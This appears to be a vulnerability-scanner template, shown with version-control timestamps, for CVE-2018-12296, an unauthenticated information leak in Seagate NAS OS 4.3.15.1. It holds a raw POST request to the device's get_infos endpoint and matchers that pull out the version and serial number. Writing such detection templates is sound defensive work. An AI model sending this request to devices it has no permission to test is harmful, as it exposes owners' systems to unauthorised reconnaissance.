2022-03-14 10:28:20 +00:00
id : CVE-2018-12296
info :
2022-03-14 12:16:34 +00:00
name : Seagate NAS OS 4.3.15.1 - Server Information Disclosure
2022-03-14 10:28:20 +00:00
author : princechaddha
severity : high
description : Insufficient access control in /api/external/7.0/system.System.get_infos in Seagate NAS OS version 4.3.15.1 allows attackers to obtain information about the NAS without authentication via empty POST requests.
reference :
- https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170
- https://nvd.nist.gov/vuln/detail/CVE-2018-12296
tags : cve,cve2018,seagate,nasos,disclosure,unauth
2022-03-14 19:05:47 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.50
cve-id : CVE-2018-12296
cwe-id : CWE-732
2022-03-14 10:28:20 +00:00
requests :
- raw :
- |
POST /api/external/7.0/system.System.get_infos HTTP/1.1
Host : {{Hostname}}
Referer : {{BaseURL}}
matchers :
- type : word
part : body
words :
- '"version":'
- '"serial_number":'
condition : and
extractors :
- type : regex
part : body
group : 1
regex :
- '"version": "([0-9.]+)"'